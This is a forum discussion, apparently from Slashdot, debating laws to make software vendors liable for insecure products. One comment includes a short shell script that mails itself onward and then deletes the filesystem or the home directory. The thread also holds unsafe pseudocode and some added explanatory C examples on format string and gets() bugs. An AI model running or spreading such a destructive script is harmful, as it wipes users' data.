I'm for this in part. Perhaps if a set of guidelines is established for each category of software to adhere to, this kind of law will have more ground to stand on. Car manufacturers can't build cars that have automatic windows that work only after the button is pressed 3 times on a sunny Wednesday morning. It's just not common sense, much less convenient. The same can be said for certain software. We know that webservers have to do one thing and one thing only: serve html pages. That's standard number one. Now if someone installs apache, for example, and then starts setting up chilisoft asp and in turn opens up a vulnerability, you don't blame apache; you blame at most chilisoft and at least your systems administrator. The same model could be used in the case of IIS (yeah I admit, it's Microsoft's own fault for trying to tightly integrate everything, but you see where I'm going). With all the various web servers, email management software, web browsers etc, there should be some strict guidelines these packages MUST adhere to before being deemed consumer ready. Let's create a consumer level class of software products that can be said to be functionally fit according to the So-and-so-Hues and Madison Quality of assurance guide. Open source software would probably benefit the most from such a model as it will help to abolish its prejudice of being "unworthy because there's no capitalist corporate entity to be held liable"..
..
Just my 00000010 cents
-=TheRoadhog=-
Bitch you KNOW the side.. WORLD MAFUCKIN WIDE..
That is all that we need - more laws to tell us how we can write software.
The whole idea of a market economy is to let the market decide what to do with poorly constructed products - and this is being handled by the market already. There is a very good reason why Microsoft does not have a strong handle on server products and why the company I work for prefers a much more expensive Unix solution.
Really, if anyone is going to trust their company infrastructure to a poorly architected product, that is a decision that they make and that person will pay accordingly.
Almost all of the serious virus outbreaks of the last two years can be traced to vulnerabilities in Microsoft products.
I'm not a fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all goes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
mail next@victim < $0
if [ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice, basically every single complaint about Microsoft insecurities was due to ease-of-use features. Outlook executes attachments; it's much easier for users to click on it to execute it. The web server exploits targeted extra services Microsoft added to make things easier for people who want to use those features. And our good pal Clippy, again, another ease-of-use feature. If people were more knowledgeable about computers there would be no need for these extra features and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users are just as important, if not more.
M I C R O S O F T
Excessive regulation will increase the entry cost of doing business for the little guy. Regulation is nothing but a speed bump to the really large companies like Microsoft, Oracle, Sun, etc.
We have been lucky that the software industry has been left alone for so long, but it is only a matter of time now.
I Heart Sorting Networks
Okay, sounds like a nice idea...to anyone that actually believes the product hype. Who's to say what "secure" actually means?
The very nature of security holes is that a great number of them aren't known about until someone spends a few weeks farting around with an app in a way that they shouldn't be doing. Now, if someone came to me and asked me to develop a bespoke application for them, I'm hardly going to say, "It'll cost you £10,000, but then we're going to f**k with it for a few months to make absolutely sure it's secure so we don't get sued by the feds, which will amount to an extra £100,000"
What should be done instead is a preventative measure against companies 'stating' that their shiny new product is secure, when it's not. But then that's already covered as false advertising. It's about time we actually saw some action on one of those cases instead. (ring any bells?)
Nothing is secure out of the box, and consumers should be made to realise that they have to compromise security in order to get cool stuff.
8===8 Dog ate my sig...
You fool! You've given cheese to a lactose intolerant volcano god! Do you know what that means?
Go with companies that have proven security records rather than ones that don't...
Don't buy every shiny new box that pops up on the shelf... Wait a few weeks...
Nobody ever considers that perhaps the consumer is responsible if they buy a shoddy product.
Hey, why not? We really need more laws, especially now that we are on the cusp of living in a society in which every law is 100% enforceable. Consider: we are about 5 years (and remember, you heard it here first) from living in a society in which just about everyone can afford a small, easily hidden device that records every minute of every conversation you had during the day. These conversations will be uploaded to your PC where they will be archived forever. Imagine the consequences of this! No more arguing with the wife over whether she told you about that appointment you missed or not. If you say it, it can AND WILL be used against you FOREVER! A few more years down the road and our every move will be tracked, and there will be a thriving black market in the illicit sales to individuals of this data. Your spouse will be able to easily determine whether you really worked late, or were visiting the local strip bar. This is what we're headed for, and who can truly say they have NOTHING to hide?? Really? You've never cranked the old Escort up to 66 mph? Remember, it doesn't matter if you inhaled or not. IMHO, this world will/would SUCK, and making more and more ever-restrictive laws is going to come back and bite us HARD on the ass.
Yep, this is off-topic and feel free to mod me to the stone ages. I just get riled up over calls for more laws and more government control when we already have too much. On topic: this is dumb anyway. Market forces will ultimately weed out the weak. If Ford still made Pintos, I doubt if anyone would be buying them.
Karma: Professionally Doomed (mostly affected by inability to keep opinions to self)
Software companies, held liable for the security of their products, would certainly apply as much pressure as possible to punish crackers. Since so many crackers come from outside the United States, that could really lead to interesting international law enforcement and judicial scenarios - not necessarily pretty ones, either.
Read the EFF's Fair Use FAQ
main_function(){
if(stdlib.getuserid() != "root") then exit "You need to have root privileges to run this program.";
else stdlib.execute_arbitrary_external_prog(stdlib.getuserinput());
}
But the following I would not:
main_function(){
// running as root
integer buflen = 5000;
stdlib.bounds_checked_read_input (stdlib.getuserinput(), buflen);
drop_root_privs();
}
even though the latter may represent a format string vulnerability.
(Entered in pseudocode lest someone get the cute idea to actually sue me)
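The distinction the poster draws (obviously reckless code versus careful-looking code that still carries a format string bug) is worth seeing in real code. This is an added C example, not the poster's pseudocode and not from any product the thread discusses; the function names, the 5000-byte buffer size and the sample input are my own. It gives a bounds-checked read like the second sketch, shows the one line that turns a harmless log statement into a format string vulnerability, and the hardened form beside it.

```c
/* Added example: a bounds-checked read, the format string mistake that can
 * still hide behind it, and the hardened form. Names and sizes are assumed. */
#include <stdio.h>
#include <string.h>

#define BUFLEN 5000   /* same order of magnitude as the poster's buflen */

/* Bounds-checked read, in the spirit of stdlib.bounds_checked_read_input():
 * copies at most buflen-1 bytes of src into dst and always NUL-terminates.
 * Returns the number of bytes actually copied. */
size_t read_bounded(char *dst, size_t buflen, const char *src)
{
    size_t n = strlen(src);
    if (buflen == 0)
        return 0;
    if (n > buflen - 1)
        n = buflen - 1;          /* truncate instead of overflowing */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* VULNERABLE pattern, kept only for contrast and never called by the tests:
 * the untrusted text IS the format string, so any "%x" or "%n" inside it is
 * interpreted by printf even though the buffer itself was bounds-checked.
 * gcc/clang flag this with -Wformat-security. */
void log_line_unsafe(const char *user)
{
    printf(user);
    putchar('\n');
}

/* Hardened pattern: the untrusted text is only ever an argument, never the
 * format. Writes "input: <text>" into out and returns the length that
 * snprintf reports, so the caller can detect truncation. */
int log_line_safe(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, "input: %s", user);
}

/* Review helper: returns 1 if untrusted text contains a '%', i.e. it would
 * be dangerous if it ever reached a format parameter. Harmless on the safe
 * path above, useful when auditing where such input flows. */
int has_format_directive(const char *s)
{
    return strchr(s, '%') != NULL;
}

int main(void)
{
    char buf[BUFLEN];
    char line[64];
    /* Constructed input standing in for stdlib.getuserinput(). */
    const char *user = "%x %x %x %n";

    read_bounded(buf, sizeof buf, user);
    log_line_safe(line, sizeof line, buf);
    printf("%s (suspicious=%d)\n", line, has_format_directive(buf));
    return 0;
}
```

The point for a reviewer is that `read_bounded` satisfies "no buffer overflow" and the program still has a bug if `buf` later reaches `printf` as the format; the fix is the literal `"%s"` in `log_line_safe`, and compiling with `-Wformat-security` catches the unsafe form mechanically.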
hey, i just noticed, the /. icon for the American flag only has 12 stripes.
I make these: http://beatseqr.com
This kind of system security isn't a criminal matter, it's a civil one. If you want to pass a law, why not pass one saying that EULAs that prohibit suing the company for selling faulty software are illegal. For most OSS projects, this wouldn't apply because there's nobody to sue. (because nobody sold you the product, it's free!)
It's a stupid idea.
Quality, security, unbugliness (is that a word?) cost time, and time is money. It's not like you can just pass a law that mandates it, and then everyone gets it for free.
Different uses have different needs. Wayne and Garth's cool discussion board doesn't need as much quality as the receptionist's inventory report, which doesn't need as much quality as NASA's space shuttle stuff.
You use discretion and intelligence and decide how much quality and risk and cost you want, and do what is best. Laws against shitty code would needlessly reduce options, and let's face it: sometimes shitty code is good enough to get the job done.
The right place for mandating security decisions is when the customer is making demands of the vendor. So if the government wants a law that the software they buy has to be secure, that's better (but still probably not completely wise). But don't spoil it for the rest of us by trying to protect us from using shitty software. The last thing I want is another case of the government protecting me from my own decisions.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
The article talks about "virus outbreaks" and "amending laws so that software makers can be held liable if their products put the public and businesses at risk."
Continuing to quote the article: "Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches," wrote the authors of the report.
And..."Although Microsoft has touted the latest version of Windows, called XP, as "its most secure operating system ever", in recent weeks it has been forced to issue a series of patches for the software to make it harder for malicious hackers to compromise it. "
And..."Many of the viruses that have plagued consumers and businesses over the last two years have spread fast and far because of weaknesses in Microsoft's popular e-mail program Outlook."
So, is it I or you who cannot seem to understand the English language?
karma is for the weak >)
As long as we're making obvious statements...be careful what you stick up your nose.
P.S. The government has all the power. Last I checked, I don't have an armored battalion in my back yard.
It is typical of researchers and students, who don't have to make a real living, to cry for government help. The market will sort this out very soon, and there is a good chance that .NET will be rejected by most corporations for, among other reasons, Microsoft's terrible security record. Why don't people do what Linus did, and create something new, rather than being a crybaby.
Yes... how realistic. I don't think that MICROS~1 software is secure, so I'm just going to dump all that junk today and build something that IS secure... by tomorrow.
Also, "free market" seems to me to mean "largest and most powerful corporate" ... free my backside. Of course, I'm currently free to use any OS at all on my systems, and do so, tho with limited success in some application areas.
On security: Any OS can be properly secured, but it takes work to make it go. Don't do the work, you get cracked. It's as simple as that. So yes, NT systems can be secured. Contrary to what MS wants you to believe, it takes work, tho.
--
Me spell chucker work grate. Need grandma chicken.
This would never hold up in court. The government tells companies what they can and cannot do too much as it is already (this includes our favorite POS, M$). Besides this, the funding for the judicial system to crack down on insecure software would be infinitesimal. Yeah, this is exactly what the people want, higher taxes. My system is secure, I shouldn't have to pay for others' ignorance and stupidity.
It should be enough to just make the software companies liable for some of the damages caused by insecure software they made. That should be enough to make insecure software disappear.
The problem would be that there are several issues with open source software and smaller software firms. Open source software, freeware and to some extent shareware must be excluded from an extension of the liability because no one would develop free (free as beer) software when he risks paying for damages caused by security holes.
Jan
That doesn't change the fact that they did not define the word "security" in the way you allege. Did it ever occur to you that what you quote there might be spin?
CEE5210S The signal SIGHUP was received.
The state of Texas has been licensing software engineers since 1998, and there is a push in software development professional organizations to have other states adopt this view of the software profession as well. With licensure comes liability.
Consumer advocates have been pushing for an end to warranty disclaimers in software for some time.
This just adds another iron to an already burning fire.
I think that all of this is good and possibly of no harm to Free Software if implemented correctly. I.e. reasonable -- but not complete -- exemption for non-commercial software, not just OSS (see my other post re: Limited Liability); penalty according to degree of negligence, speed of response to notification, etc.
It would be interesting if laws like this were applied to software only if it claimed it was secure.
A nice way to handle this would be to force companies to be responsible for the security of their products or have to place a large logo and notice on their download site/boxes which clearly states that 'This software is not certified secure and may contain dangerous security flaws which could put your data and privacy at risk'.
Companies don't want to be responsible legally, just put the logo on your box. Otherwise you're screwed if you write bad software.
I'd love to see Windows XP-2 on the counters with a big red logo stating 'This product is insecure!'.
Aaron
AaronCameron.net
You're right. People often talk about viruses and hacking into systems when they mean copyright. I'm sorry.
karma is for the weak >)
Not at all. In fact IE is a horrible example. You get IE whether you want it or not. Remember it is a part of the M$ Windows OS. Since it is part of the OS, you are paying for it. It's part of the product.
.. wtf am I smoking these days)
Take for example ncftpd. Gleason can not say "hey, when you buy my product all you're buying is the "IO logging facility", the rest of it is free. And OBTW, the only way you can get the rest of the program for free is to buy the logging facility. Therefore I am not liable for anything bad that may happen to the rest of it since it is free."
On the other hand, this law might change M$'s mind on how they package up their OS. Outlook and IE might turn out to be "Free" packages available to be installed but not needed. (gawd
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
If companies faced lawsuits and financial penalties when vulnerabilities were found and exploited, they would strongly discourage white-hat hacking, independent vulnerability testing, etc. It would be in Microsoft's best interests to immediately sue anyone who reports a flaw. (White hat hacking violates US law just as black hat does.)
Lawyers would start to be accused of Bugtraq chasing.
I used to support the Libertarians. Why should The Man have the right to tell idiots to wear helmets? Just make motorcycle riders carry enough insurance to cover their costs when they get non-fatal brain injuries (so I don't have to pay for their mistakes) and let them have fun.
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're a threat to all of us. I don't think we should ban alcohol, but I don't see a problem with the state having the right to crack down on repeat drunk drivers because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstratively harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's shoddy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstrably harms others, so be it.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
in the article is mentioned:
"Many of the viruses that have plagued consumers and businesses over the last two years have spread fast and far because of weaknesses in Microsoft's popular e-mail program Outlook."
maybe they should change the name of the program to lookout!
exploits are found far more commonly in Linux than in Windows.
The NAS, god bless 'em, tend to make their books available to the great unwashed; you have signed on for email updates, haven't you?
Well, just in case you haven't the draft report is available for online perusal here
PS I said NAS, not NSA. Just to be clear.
This is program fubar. If you run it, it will randomly do one of the following:
Freedom of contract works well in competitive markets. If I don't like the boilerplate contract provided by Hertz, I not only have the option of foregoing renting the car, I have the option of renting a car from Avis. Competitive pressures will affect the contract terms, just as they affect prices, and will result in an efficient market.
A copyright holder, however, is by definition a monopolist, and is relatively free from competitive pressure in negotiating contracts. (I say "relatively" free, because there may be imperfect substitutes. I could read a novel by Clive Barker instead of Stephen King, or choose a word processor from Corel instead of MS.)
This wouldn't be so bad if the copyright holder could negotiate the contract with each purchaser independently. (Like a monopolist who does perfect price discrimination, this still results in an efficient market.) But that's really not practical. The transaction costs of negotiating a contract are high, so we end up with boilerplate contracts with obnoxious terms and an inefficient market.
The solution we arrived at with books and music is a legally mandated contract. (Think of "fair use", "first-sale doctrine", and fixed royalties to songwriters for songs broadcast on the radio.)
I'm not saying that we should hold software copyright holders liable for security problems. I think that's too much to impose on them, and the end result will be less software produced. But that's a more sophisticated analysis than mere appeal to "freedom of contract".
Um, yeah, that makes sense.
My beliefs do not require that you agree with them.
If you're thick enough to believe that that's the only direction that it would take, I sincerely hope you aren't an American, because this country needs less sheep.
CEE5210S The signal SIGHUP was received.
What other product? All those alternative PC operating systems that run required Windows apps flawlessly. I try not to use Windows wherever possible, but it's the range of apps and hardware that present a difficulty in switching. A market dominated by one company that makes specific efforts to prevent switching from its products is not a free market.
Does a Christian soccer team even need a goalkeeper?
Laws to Punish Insecure Software Vendors? When I first read the title I thought it was talking about software vendors that lacked self-confidence and that couldn't talk to girls and s
--- rapper/producer/bachelorette party stripper
I am an American, and you can shove that little thing up your ass. Just because you think everyone, everywhere wants to stop you from ripping your DVDs and posting them to USENET doesn't mean it's true. There are more important things than this. Also, if you weren't so fscking stupid, you could see that, although they don't spell it out like your mom does, they do clearly imply that the security they refer to is that of protection and not copyright.
karma is for the weak >)
The government involvement needs to be limited to its activity as a consumer protection agent.
The government should review the questionable software and force RECALLs like they do with other dangerous products like toys and cars and stuff.
Making NEW law isn't needed here -- simply enforcing current law is enough.
is a "clause" in the law that simply states this.
A software company/programmer can only become liable should their product be sold for commercial value or profit. Software such as freeware or open source is not liable since it falls under "what you see is what you get". Should the free program contain malicious or intentional security holes/problems, this clause becomes null and void.
But here is something else I did not see written by anyone else. Should such a law be passed, open source software will pretty much vanish from the business world. Seriously, what manager would really want to run it. Can't profit from it if it goes wrong, so why use it.
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
Many people don't probably realize it but this would be the best thing that could happen to Microsoft. To illustrate the point, consider the fact that US government institutions use almost exclusively Microsoft products but many people don't know that this is actually enforced by law.
There is a law that states that government may only use software, which has certain accessibility features (usable by vision impaired, for example). There is a big bunch of standard requirements that the software products must follow to be in compliance with this law. Now Microsoft is one of the very few companies that can afford compliance with this law.
Now consider what would happen with this proposal when it gets passed. Most probably it will be transformed into an arbitrary set of rather stupid standards and guidelines by our legislative bodies, and again, Microsoft would be the only one able to follow these standards.
When men used to be men
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, along side of the industry lobbyists, consumer advocates and politicians.
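The gets() example the poster raises is a good one, because the defect is in the function's signature rather than in any particular call. As an added illustration (not code from any commenter), the block below contrasts gets() with a bounded line reader that reports truncation instead of silently cutting input short; the in-memory input is constructed here and uses POSIX fmemopen, which is an assumption about the platform.

```c
/* Added example: why gets() cannot be used safely, and a bounded
 * replacement that tells the caller when a line did not fit. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* gets(char *s) has no length argument. The callee cannot know the size of
 * the caller's buffer, so any line longer than the buffer is written past
 * its end. No amount of care at the call site fixes that, which is why the
 * function was removed from the C standard library in C11. */

/* Result codes for read_line_bounded. */
enum line_status { LINE_OK = 0, LINE_TRUNCATED = 1, LINE_EOF = 2 };

/* Read one line into buf (capacity cap, including the NUL terminator) and
 * strip the trailing newline. If the line does not fit, the rest of that
 * line is consumed and discarded so the next call starts on a fresh line,
 * and LINE_TRUNCATED is returned so the caller can reject the input rather
 * than operate on a silently cut-off value. */
enum line_status read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        if (cap > 0) buf[0] = '\0';
        return LINE_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return LINE_OK;
    }
    /* No newline in the buffer: either the line was longer than cap-1, or
     * this is the final line of the stream without a newline. Peek one
     * character to tell the two cases apart. */
    int c = fgetc(in);
    if (c == EOF) return LINE_OK;
    /* Overlong line: drain the remainder so the stream stays line-aligned. */
    while (c != '\n' && c != EOF) c = fgetc(in);
    return LINE_TRUNCATED;
}

/* Stand-alone demo over a constructed in-memory stream. */
int main(void)
{
    char input[] = "short\nthis line is far too long for the buffer\nend";
    FILE *in = fmemopen(input, strlen(input), "r");
    char buf[8];
    enum line_status st;
    if (in == NULL) return 1;
    while ((st = read_line_bounded(buf, sizeof buf, in)) != LINE_EOF)
        printf("%-9s \"%s\"\n", st == LINE_OK ? "ok" : "truncated", buf);
    fclose(in);
    return 0;
}
```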
We are not licensed by any authority. How can you punish someone that is not bound by some central authority? Insecure software is a relative term... I don't remember taking an "Alan Turing Oath" when I graduated from college.
You can sue a doctor for malpractice, since he/she is licensed, you could sue a nurse, since he/she is licensed...i.e. they are licensed to provide a certain level of quality caregiving...Hell you could sue a lawyer, a CPA...but sorry, Programmers are off limits
You cannot, I repeat cannot, sue a programmer/company for insecure software; maybe you should just change vendors if you are unhappy with your product, it's the Capitalist way.
Until programmers have to pass some sort of a "BOARD" exam, this is just ignorant, or maybe I am.
Ooh, name calling and invective. I knew you were that intelligent.
CEE5210S The signal SIGHUP was received.
So i read you think MS should be liable when they sell me office but not when they give me internet explorer or the free outlook light... (express) ROFLMAO "But software that is free, free as in free beer, should not be liable. I've always felt that if you are providing something for free, and you don't force it into people's hands, those people should understand the risks of using it. "
Americans that think preserving the fourth amendment is just about ripping DVDs and posting them to USENET are morons. But by the time they figure it out, it'll be too late.
Another proud carrier of the $rtbl flag
Yay! Now I don't have to be personally responsible for anything!
Just joking. I do think Nader's a moron but that's because I've been Libertarian since '96.
Hollow words will burn and hollow men will burn.
You can find the report on-line at http://books.nap.edu/html/cybersecurity/ .
10 print "HELLO WORLD"
20 goto 10
sulli
RTFJ.
"Sir, we have reason to believe that you released a program, GNU/donothing, which has a buffer overflow in line 1723. You're under arrest. Please turn around, put your hands behind your head, and lace your fingers. Do you have any guns, knives, needles, pins, atomic bombs, or PalmPilots with more bad code that I should know about?"
I've made just a little under two thousand arrests in my career, but none quite like that. And frankly, I'd like to be able to go all the way to my pension and keep it that way.
And let's be realistic. Who is going to write a definition of "secure" that'll actually fit into a statute, that 80% of the judges out there will be able to understand?
Actually, now that I think about it, even expanded civil liability is a questionable idea. My Windows box isn't going to get out of control on the freeway and flatten twelve kids because Microsoft did a crappy job on the brakes. And KDE has crashed on me seven times this week (!) If we expand liability, without taking a lot of care, then I could 0wn at least one of the programmers in court.
So does this mean I can sue Kwikset because some idiot took a chainsaw to the side of my house, sawed their way in and stole the watermelon out of my fridge?
After all, the package the lock was sold in implied it would make my house more secure.
Maybe I should sue Poulan because their chainsaw didn't have a warning label that said "use on house walls may cause personal injury due to possible presence of live electrical cabling." I'll bet that would've stopped the burglar.
Noooo....... I've got a better idea...... I'll sue the farmer that grew the watermelon. After all, he created an "attractive nuisance." And there's laws against that.
What about Whirlpool? My fridge doesn't have a factory-installed alarm system. How am I supposed to keep my watermelons secure? Let's sue the pants off of Factory Specification Parts!!
Give me my freedom, and I'll take care of my own security, thank you.
There is always a modicum of regulation for manufacturing anything. Luckily, these laws are just for show and Corporations generally ignore them because, well, the regulation is never written to be strong enough to harm the Corporation. Might interfere with the GOP after all. ;p
> Petitioning for geographical/geo-political HTTP request headers in client browsers.
That's stupid, it allows for more censorship of the internet based on the laws of the client.
Don't you think that it goes against the distribution of information in favor of borders?
- Kaos games and encryption systems developer
There is such a thing called "Due Diligence". If a vendor (of any kind) does not create products of a quality of at least the average for the field, and that product is a critical component, the purchaser has the right to sue the vendor for lack of due diligence. The problem is the licensing says essentially that the software vendor is immune from Due Diligence. We need laws that limit the capabilities of licensing, and not laws that hold software vendors liable for insecurities.
Just my opinion, but it seems to make sense.
Wherever you go, there I am...
I, personally, do not want the US government to have such powers over the software industry. It will merely add another level of headaches to developers around the country. If the product has security flaws, they will be fixed or people will not buy it. It will all pan out naturally.
It's never a good idea to formalize issues like these into laws. Consumer preference and freedom of the market allows consumers to create a self-correcting system. If there is a major problem with a product (not necessarily software), the consumers vote with their purchases or lack thereof. This can be seen in people turning away from Firestone towards Goodyear or corporations turning away from Windows servers towards Linux.
However, if corporations were to be fined because of vulnerabilities in their system, they would most likely pass the cost down to the consumers. Large corporations would probably purchase business insurance to cover these potential problems (the same way doctors have Medical insurance). However, it is the small companies that will suffer. Unable to afford insurance, the first major problem in their software could bankrupt a company leading to a small number of large corporations rather than a large number of small corporations.
Lastly, to be able to produce secure software, it is almost mandatory to understand computer science theories such as computability or complexity. This could lead to a requirement (not necessarily a law but a social requirement) for a programmer to be a licensed engineer. This is much in the same way that you need a civil engineer license to build bridges. I mean, just about anyone could build a bridge, but you need to understand civil engineering principles to ensure that the bridge functions to specifications.
_______________________________
"I'm not Conceited...I'm just a realist..."
filler
All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
What would Bill say?
"First they punish us for innovation, and now they want to punish us for feeling insecure? That's incredible! Memo to marketing: words beginning with 'IN' no longer to be used in PR materials."
the whole point of a company being at fault of a faulty product is if there's been actual damage done.
has someone been killed? has there been a huge monetary loss because the software company is directly responsible for a blatant defect?
this also raises the question: how much time can pass before the software company is no longer responsible?
when a particular software product is released, and there are no known vulnerabilities at the time of release, then the software company shouldn't be held responsible for future findings, unless those findings are blatant mistakes.
And just what is the definition of "secure enough"? No malformed headers for TCP/IP? No buffer overflowing URLs? Is all software supposed to be "secure enough" or only the components that access the Internet?
And what about flaws introduced into your software by buggy software that was used in development? Who will be at fault when you discover a buffer overflow due to a buggy compiler and not the code you wrote? Will your code have to take care of known (and unknown) bugs in your development tools in order to comply with "secure enough"?
Government intervention is just going to make a mess of the software industry and slow the growth of the Internet.
If "disco" means "I learn" in Latin, does "discothèque" mean "I learn technology"?
Let's see here... one security hole in Sun, a couple of dozen hacks and exploits in general for UNIX and Linux... 65000+ (and growing daily) virii, hacks, attacks and exploits for microsnot OSes...
Sure looks balanced to me.
it will also be used to justify criminalizing of people who find and reveal security exploits so that products "seem" more secure to joe clueless moron taxpayer because everyone who publicly states the truth will be silenced.
I don't think laws are going to solve the problem. Insecurity always starts with issues from childhood.
Never underestimate the power of fiber.
Question: Why in the heck should they not be allowed to do whatever the hell they want with their own product? If it's easy to pirate their stuff, who should care but the people putting it out?
Derek Greene
#include <stdio.h>
int main(void)
{
    for(;;)
    {
        printf ("Hello World!\n");
    }
}
Surely there's a security hole here somewhere. Give us enough time, we'll find it.
Give me my freedom, and I'll take care of my own security, thank you.
If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
Well if your bridge collapses then I'll take my business to a competing bridge ;)
Sarcasm aside, the free market is the best way to sort out things such as optimal value. When there is a free, level, and liquid market, then it is the best choice.
I do believe that there is a sufficiently free market for OS's that no government regulation could help. (It could easily make things worse though). Even Microsoft uses unix to master their CD's, because their own OS is not secure enough to handle such a critical function. (anyone still have that link?)
ONLY in cases where the free market doesn't work (because of practical barriers to competition) (Utilities, Transportation, and "Last mile" Communications) should government oversight be accepted as the lesser evil. And in those areas, the government might restrict your right to produce faulty products.
PS: Free speech applies to source code, but not necessarily to the commercial sale of source code. In cases where code is simply exchanged with no sale, contract, implicit guarantees, warranties, or other inference that the code is useful for any particular purpose, then no regulation or liability should be able to arise.
There is an ongoing argument that releasing things into the public domain could create liability for the releasor. Since it is fully possible to release things into the public domain anonymously, the argument can be rendered moot. Just don't say who you are when you post things to freenet.
I see a lot of parallels to the patent process in this topic. Why is it that intellectuals, of all people, think that passing legislation that would lead to grossly subjective enforcement is good for an industry?
What will inevitably happen is that those who can demonstrate that they have procedures in place to remedy security holes (through patches, alerts, etc.) will be immune to enforcement efforts. The actual quality or security of the software itself will become irrelevant because no government funded operation will be able to measure quality appropriately. In other words, the evaluation process turns into the question: "How much are you spending in relation to your sales to ensure security of your products?", not "How secure are your products, and how important is security within your application?"
This terrorism argument is getting stale. How long will we let our government act as if intellectual property, private data, etc., are all our nation's collective interests. If the government wants to establish standards for software they purchase internally, fine. IMHO, that's a procurement issue, not one of industry regulation.
Let's let capitalism handle the rest naturally. Bottom Line:
- if a company promises that certain actions are secure, they're subject to civil suit if they fail
- if a company demonstrates a good track record for security and reliability and gives the greatest peace of mind, they will be the choice of enterprise business (i.e. Oracle, Sun, etc.)
I'm getting sick of the sentiment that government involvement in technology will improve the industry. The only industry this type of legislation helps is the legal industry, and having a massive legal industry for internal matters certainly does not promote economic growth.
USA ULA
1) Do not install anything.
2) Do not Change any system settings.
3) Do not delete anything.
4) Only save files to C:\Documents\
5) Do not open email attachments
6) Do not download anything.
7) All patches must be installed or we are not liable.
Sounds fair to me! {NOT!}
It's really very basic: ensuring better security is costly, and so is handling the threat of liabilities (for example by buying insurance to cover the risk). These are costs and risks a large corporation (like Microsoft) may be able to handle, but for small outfits, or small open source projects, it's much harder. Something the size of Mozilla, or the Linux kernel, can afford good QA and will find backers to handle the risks, but small projects would be forced under the cover of some larger organisation or the distributors. Also, in the case of open source projects, the sponsors would demand some say in the development process, or maybe even licensing of the software. But small software makers are in a similar position: to handle the risk of litigation they'd need a backer, and they won't have the resources until their software sells well.
By charging higher premiums to insure companies using software with a bad track record, there are already market forces in place: include that difference in premiums in the TCO-calculations microsoft is so fond of to prove that Windows is cheaper than any competition, and make management aware of it (and make them wonder why that insurance company wants higher premiums for insuring against damages from security holes in that software).
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least. A better idea would be an independent (that's the hard part) organisation providing certification of software. Once that is established there could be legislation demanding minimum standards for software used in certain critical areas.
That way each software maker could choose how much to invest in security and QA, and it would be more transparent for customers how secure a product really is, so they wouldn't have to rely on the software makers' advertising for that kind of information. In effect the insurance conditions and premiums for different kinds of software are already an indicator for its security, and the insurance companies probably have a high interest in accurately estimating the risks, so probably they should play some part in ensuring the proposed organisation's independence.
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
Great. A law that will punish developing companies who make a seldom used product that happens to have a security flaw that virtually no one knows about. It'd be great if we took away all their revenues while keeping their costs the same.
And for the real problems? Relax! IE is free.
Government is the shadow cast by big business!
Although I don't want to post a really long comment, I did write an article on the trend for legal solutions to technical problems - read it here
Software companies, either closed or open source, should be forced to recall all unsold software from distributors and not be permitted to release anything but a fixed version.
It annoys me to no end to see Windows XP still on store shelves and being told by the salesman "don't worry, just go to Windows Update".
IMO the expense and loss of momentum would be enough to make software companies take a hard look at what they are releasing.
Damn when they said snap into a slim jim they weren't kidding!! lol....
Why not change the laws on the other side? If you're too stupid to secure your site, or buy software that is insecure, you can't come after me for replacing your data with a few terabytes of porn.
With rights come responsibility. PJ O'Rourke said something along the lines of "Everyone has the right to do whatever they want, and the responsibility to accept the consequences."
